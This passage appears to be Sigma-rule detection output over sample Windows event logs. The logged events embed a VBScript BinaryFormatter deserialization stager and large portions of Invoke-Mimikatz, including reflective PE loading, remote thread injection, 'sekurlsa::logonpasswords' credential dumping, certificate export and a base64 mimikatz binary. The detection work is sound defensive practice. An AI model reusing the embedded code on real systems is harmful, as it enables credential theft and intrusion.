wODldXSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLlR5cGUsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dCT4AAAAKCT4AAAAGcgAAAIQBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuSUVudW1lcmF0b3JgMVtbU3lzdGVtLlR5cGUsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBnMAAAALZ2V0X0N1cnJlbnQKAUsAAABDAAAACXMAAAAJPgAAAAlyAAAABnYAAAAZU3lzdGVtLlR5cGUgZ2V0X0N1cnJlbnQoKQZ3AAAAGVN5c3RlbS5UeXBlIGdldF9DdXJyZW50KCkIAAAACgFMAAAAQgAAAAZ4AAAAxgFTeXN0ZW0uRnVuY2AyW1tTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0JPgAAAAoJPgAAAAZ6AAAAEFN5c3RlbS5BY3RpdmF0b3IGewAAAA5DcmVhdGVJbnN0YW5jZQoBTQAAAEMAAAAJewAAAAk+AAAACXoAAAAGfgAAAClTeXN0ZW0uT2JqZWN0IENyZWF0ZUluc3RhbmNlKFN5c3RlbS5UeXBlKQZ/AAAAKVN5c3RlbS5PYmplY3QgQ3JlYXRlSW5zdGFuY2UoU3lzdGVtLlR5cGUpCAAAAAoBTgAAAA8AAAAGgAAAACZTeXN0ZW0uQ29tcG9uZW50TW9kZWwuRGVzaWduLkNvbW1hbmRJRAQAAAAJOgAAABBPAAAAAgAAAAmCAAAACAgAIAAABIIAAAALU3lzdGVtLkd1aWQLAAAAAl9hAl9iAl9jAl9kAl9lAl9mAl9nAl9oAl9pAl9qAl9rAAAAAAAAAAAAAAAIBwcCAgICAgICAhMT0nTuKtERi/sAoMkPJvcLCw==\\\"\r\\n\r\\nDim fmt_1\r\\nSet fmt_1 = CreateObject(\\\"System.Runtime.Serialization.Formatters.Binary.BinaryFormatter\\\")\r\\nfmt_1.Deserialize_2(Base64ToStream(stage_1, 2341))\r\\n\r\\nIf Err.Number <> 0 Then\r\\n  Dim fmt_2\r\\n  Set fmt_2 = CreateObject(\\\"System.Runtime.Serialization.Formatters.Binary.BinaryFormatter\\\")\r\\n  fmt_2.Deserialize_2(Base64ToStream(stage_2, 20104))\r\\nEnd If\r\\n\r\\n\r\\n\"  Provider_Name: Microsoft-Windows-Sysmon  Provider_Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9  EventID: 20  Version: 3  Level: 4  Task: 20  Opcode: 0  Keywords: 9223372036854775808  TimeCreated_SystemTime: 1.630497103601843e+09  EventRecordID: 1816  Execution_ProcessID: 5528  Execution_ThreadID: 3328  Channel: Microsoft-Windows-Sysmon/Operational  Computer: dc01.isengard.local  Security_UserID: S-1-5-18  EventID: 20  ",
  "File": "evtx/sysmon-blacksmith.evtx",
  "Channel": "Microsoft-Windows-Sysmon/Operational"
}
{
  "RulePath": "/Users/neo/code/Workspace/sigma/rules/windows/builtin/win_alert_mimikatz_keywords.yml",
  "RuleTitle": "Mimikatz Use",
  "RuleId": "06d71506-7beb-4f22-8888-e2e5e2ca7fd8",
  "RuleLevel": "high",
  "MatchStrings": [
    {
      "SearchIdentifier": "keywords",
      "Field": "raw",
      "Offset": 8144,
      "Data": "sekurlsa::"
    }
  ],
  "Event": "MessageNumber: \u000b  MessageTotal: �  ScriptBlockText: nyways\" -WarningAction Continue\n\t\t\t\t}\n\t\t\t\t\n\t\t\t\t$Success = $Win32Functions.FreeLibrary.Invoke($ImportDllHandle)\n\t\t\t\tif ($Success -eq $false)\n\t\t\t\t{\n\t\t\t\t\tWrite-Warning \"Unable to free library: $ImportDllPath. Continuing anyways.\" -WarningAction Continue\n\t\t\t\t}\n\t\t\t\t\n\t\t\t\t$ImportDescriptorPtr = Add-SignedIntAsUnsigned ($ImportDescriptorPtr) ([System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.IMAGE_IMPORT_DESCRIPTOR))\n\t\t\t}\n\t\t}\n\t\t\n\t\t#Call DllMain with process detach\n\t\tWrite-Verbose \"Calling dllmain so the DLL knows it is being unloaded\"\n\t\t$DllMainPtr = Add-SignedIntAsUnsigned ($PEInfo.PEHandle) ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.AddressOfEntryPoint)\n\t\t$DllMainDelegate = Get-DelegateType @([IntPtr], [UInt32], [IntPtr]) ([Bool])\n\t\t$DllMain = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($DllMainPtr, $DllMainDelegate)\n\t\t\n\t\t$DllMain.Invoke($PEInfo.PEHandle, 0, [IntPtr]::Zero) | Out-Null\n\t\t\n\t\t\n\t\t$Success = $Win32Functions.VirtualFree.Invoke($PEHandle, [UInt64]0, $Win32Constants.MEM_RELEASE)\n\t\tif ($Success -eq $false)\n\t\t{\n\t\t\tWrite-Warning \"Unable to call VirtualFree on the PE's memory. Continuing anyways.\" -WarningAction Continue\n\t\t}\n\t}\n\n\n\tFunction Main\n\t{\n\t\t$Win32Functions = Get-Win32Functions\n\t\t$Win32Types = Get-Win32Types\n\t\t$Win32Constants =  Get-Win32Constants\n\t\t\n\t\t$RemoteProcHandle = [IntPtr]::Zero\n\t\n\t\t#If a remote process to inject in to is specified, get a handle to it\n\t\tif (($ProcId -ne $null) -and ($ProcId -ne 0) -and ($ProcName -ne $null) -and ($ProcName -ne \"\"))\n\t\t{\n\t\t\tThrow \"Can't supply a ProcId and ProcName, choose one or the other\"\n\t\t}\n\t\telseif ($ProcName -ne $null -and $ProcName -ne \"\")\n\t\t{\n\t\t\t$Processes = @(Get-Process -Name $ProcName -ErrorAction SilentlyContinue)\n\t\t\tif ($Processes.Count -eq 0)\n\t\t\t{\n\t\t\t\tThrow \"Can't find process $ProcName\"\n\t\t\t}\n\t\t\telseif ($Processes.Count -gt 1)\n\t\t\t{\n\t\t\t\t$ProcInfo = Get-Process | where { $_.Name -eq $ProcName } | Select-Object ProcessName, Id, SessionId\n\t\t\t\tWrite-Output $ProcInfo\n\t\t\t\tThrow \"More than one instance of $ProcName found, please specify the process ID to inject in to.\"\n\t\t\t}\n\t\t\telse\n\t\t\t{\n\t\t\t\t$ProcId = $Processes[0].ID\n\t\t\t}\n\t\t}\n\t\t\n\t\t#Just realized that PowerShell launches with SeDebugPrivilege for some reason.. So this isn't needed. Keeping it around just incase it is needed in the future.\n\t\t#If the script isn't running in the same Windows logon session as the target, get SeDebugPrivilege\n#\t\tif ((Get-Process -Id $PID).SessionId -ne (Get-Process -Id $ProcId).SessionId)\n#\t\t{\n#\t\t\tWrite-Verbose \"Getting SeDebugPrivilege\"\n#\t\t\tEnable-SeDebugPrivilege -Win32Functions $Win32Functions -Win32Types $Win32Types -Win32Constants $Win32Constants\n#\t\t}\t\n\t\t\n\t\tif (($ProcId -ne $null) -and ($ProcId -ne 0))\n\t\t{\n\t\t\t$RemoteProcHandle = $Win32Functions.OpenProcess.Invoke(0x001F0FFF, $false, $ProcId)\n\t\t\tif ($RemoteProcHandle -eq [IntPtr]::Zero)\n\t\t\t{\n\t\t\t\tThrow \"Couldn't obtain the handle for process ID: $ProcId\"\n\t\t\t}\n\t\t\t\n\t\t\tWrite-Verbose \"Got the handle for the remote process to inject in to\"\n\t\t}\n\t\t\n\n\t\t#Load the PE reflectively\n\t\tWrite-Verbose \"Calling Invoke-MemoryLoadLibrary\"\n\n        try\n        {\n            $Processors = Get-WmiObject -Class Win32_Processor\n        }\n        catch\n        {\n            throw ($_.Exception)\n        }\n\n        if ($Processors -is [array])\n        {\n            $Processor = $Processors[0]\n        } else {\n            $Processor = $Processors\n        }\n\n        if ( ( $Processor.AddressWidth) -ne (([System.IntPtr]::Size)*8) )\n        {\n            Write-Verbose ( \"Architecture: \" + $Processor.AddressWidth + \" Process: \" + ([System.IntPtr]::Size * 8))\n            Write-Error \"PowerShell architecture (32bit/64bit) doesn't match OS architecture. 64bit PS must be used on a 64bit OS.\" -ErrorAction Stop\n        }\n\n        #Determine whether or not to use 32bit or 64bit bytes\n        if ([System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr]) -eq 8)\n        {\n            [Byte[]]$PEBytes = [Byte[]][Convert]::FromBase64String($PEBytes64)\n        }\n        else\n        {\n            [Byte[]]$PEBytes = [Byte[]][Convert]::FromBase64String($PEBytes32)\n        }\n        $PEBytes[0] = 0\n        $PEBytes[1] = 0\n\t\t$PEHandle = [IntPtr]::Zero\n\t\tif ($RemoteProcHandle -eq [IntPtr]::Zero)\n\t\t{\n\t\t\t$PELoadedInfo = Invoke-MemoryLoadLibrary -PEBytes $PEBytes -ExeArgs $ExeArgs\n\t\t}\n\t\telse\n\t\t{\n\t\t\t$PELoadedInfo = Invoke-MemoryLoadLibrary -PEBytes $PEBytes -ExeArgs $ExeArgs -RemoteProcHandle $RemoteProcHandle\n\t\t}\n\t\tif ($PELoadedInfo -eq [IntPtr]::Zero)\n\t\t{\n\t\t\tThrow \"Unable to load PE, handle returned is NULL\"\n\t\t}\n\t\t\n\t\t$PEHandle = $PELoadedInfo[0]\n\t\t$RemotePEHandle = $PELoadedInfo[1] #only matters if you loaded in to a remote process\n\t\t\n\t\t\n\t\t#Check if EXE or DLL. If EXE, the entry point was already called and we can now return. If DLL, call user function.\n\t\t$PEInfo = Get-PEDetailedInfo -PEHandle $PEHandle -Win32Types $Win32Types -Win32Constants $Win32Constants\n\t\tif (($PEInfo.FileType -ieq \"DLL\") -and ($RemoteProcHandle -eq [IntPtr]::Zero))\n\t\t{\n\t\t\t#########################################\n\t\t\t### YOUR CODE GOES HERE\n\t\t\t#########################################\n                    Write-Verbose \"Calling function with WString return type\"\n\t\t\t\t    [IntPtr]$WStringFuncAddr = Get-MemoryProcAddress -PEHandle $PEHandle -FunctionName \"powershell_reflective_mimikatz\"\n\t\t\t\t    if ($WStringFuncAddr -eq [IntPtr]::Zero)\n\t\t\t\t    {\n\t\t\t\t\t    Throw \"Couldn't find function address.\"\n\t\t\t\t    }\n\t\t\t\t    $WStringFuncDelegate = Get-DelegateType @([IntPtr]) ([IntPtr])\n\t\t\t\t    $WStringFunc = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WStringFuncAddr, $WStringFuncDelegate)\n                    $WStringInput = [System.Runtime.InteropServices.Marshal]::StringToHGlobalUni($ExeArgs)\n\t\t\t\t    [IntPtr]$OutputPtr = $WStringFunc.Invoke($WStringInput)\n                    [System.Runtime.InteropServices.Marshal]::FreeHGlobal($WStringInput)\n\t\t\t\t    if ($OutputPtr -eq [IntPtr]::Zero)\n\t\t\t\t    {\n\t\t\t\t    \tThrow \"Unable to get output, Output Ptr is NULL\"\n\t\t\t\t    }\n\t\t\t\t    else\n\t\t\t\t    {\n\t\t\t\t        $Output = [System.Runtime.InteropServices.Marshal]::PtrToStringUni($OutputPtr)\n\t\t\t\t        Write-Output $Output\n\t\t\t\t        $Win32Functions.LocalFree.Invoke($OutputPtr);\n\t\t\t\t    }\n\t\t\t#########################################\n\t\t\t### END OF YOUR CODE\n\t\t\t#########################################\n\t\t}\n\t\t#For remote DLL injection, call a void function which takes no parameters\n\t\telseif (($PEInfo.FileType -ieq \"DLL\") -and ($RemoteProcHandle -ne [IntPtr]::Zero))\n\t\t{\n\t\t\t$VoidFuncAddr = Get-MemoryProcAddress -PEHandle $PEHandle -FunctionName \"VoidFunc\"\n\t\t\tif (($VoidFuncAddr -eq $null) -or ($VoidFuncAddr -eq [IntPtr]::Zero))\n\t\t\t{\n\t\t\t\tThrow \"VoidFunc couldn't be found in the DLL\"\n\t\t\t}\n\t\t\t\n\t\t\t$VoidFuncAddr = Sub-SignedIntAsUnsigned $VoidFuncAddr $PEHandle\n\t\t\t$VoidFuncAddr = Add-SignedIntAsUnsigned $VoidFuncAddr $RemotePEHandle\n\t\t\t\n\t\t\t#Create the remote thread, don't wait for it to return.. This will probably mainly be used to plant backdoors\n\t\t\t$RThreadHandle = Invoke-CreateRemoteThread -ProcessHandle $RemoteProcHandle -StartAddress $VoidFuncAddr -Win32Functions $Win32Functions\n\t\t}\n\t\t\n\t\t#Don't free a library if it is injected in a remote process\n\t\tif ($RemoteProcHandle -eq [IntPtr]::Zero)\n\t\t{\n\t\t\tInvoke-MemoryFreeLibrary -PEHandle $PEHandle\n\t\t}\n\t\telse\n\t\t{\n\t\t\t#Just delete the memory allocated in PowerShell to build the PE before injecting to remote process\n\t\t\t$Success = $Win32Functions.VirtualFree.Invoke($PEHandle, [UInt64]0, $Win32Constants.MEM_RELEASE)\n\t\t\tif ($Success -eq $false)\n\t\t\t{\n\t\t\t\tWrite-Warning \"Unable to call VirtualFree on the PE's memory. Continuing anyways.\" -WarningAction Continue\n\t\t\t}\n\t\t}\n\t\t\n\t\tWrite-Verbose \"Done!\"\n\t}\n\n\tMain\n}\n\n#Main function to either run the script locally or remotely\nFunction Main\n{\n\tif (($PSCmdlet.MyInvocation.BoundParameters[\"Debug\"] -ne $null) -and $PSCmdlet.MyInvocation.BoundParameters[\"Debug\"].IsPresent)\n\t{\n\t\t$DebugPreference  = \"Continue\"\n\t}\n\t\n\tWrite-Verbose \"PowerShell ProcessID: $PID\"\n\t\n\n\tif ($PsCmdlet.ParameterSetName -ieq \"DumpCreds\")\n\t{\n\t\t$ExeArgs = \"sekurlsa::logonpasswords exit\"\n\t}\n    elseif ($PsCmdlet.ParameterSetName -ieq \"DumpCerts\")\n    {\n        $ExeArgs = \"crypto::cng crypto::capi `\"crypto::certificates /export`\" `\"crypto::certificates /export /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE`\" exit\"\n    }\n    else\n    {\n        $ExeArgs = $Command\n    }\n\n    [System.IO.Directory]::SetCurrentDirectory($pwd)\n\n    # 2.1 (x64) 20161029 OJ Edition!\n    # SHA256 hash: C36572664731F058A282FA6F943E48FE80646F6613C3A46F3EEE1F4A121B2158\n    # VirusTotal Analysis: https://www.virustotal.com/en/file/c36572664731f058a282fa6f943e48fe80646f6613c3a46f3eee1f4a121b2158/analysis/1478821040/\n    $PEBytes64 = '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  ScriptBlockId: 334734fa-3743-480e-8341-8c3c57da0950  Path: C:\\Users\\neo\\Downloads\\Invoke-Mimikatz.ps1  Provider_Name: Microsoft-Windows-PowerShell  Provider_Guid: A0C1853B-5C40-4B15-8766-3CF1C58F985A  EventID: 4104  Version: 1  Level: 3  Task: 2  Opcode: 15  Keywords: 0  TimeCreated_SystemTime: 1.5746709037001536e+09  EventRecordID: 650  Correlation_ActivityID: 7CA979B2-A06E-0000-9C73-AA7C6EA0D501  Execution_ProcessID: 8212  Execution_ThreadID: 1824  Channel: Microsoft-Windows-PowerShell/Operational  Computer: HYPERION  Security_UserID: S-1-5-21-1569579455-888006095-2183311757-1001  EventID: 4104  ",
  "File": "evtx/Win10-PowerShell.evtx",
  "Channel": "Microsoft-Windows-PowerShell/Operational"
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment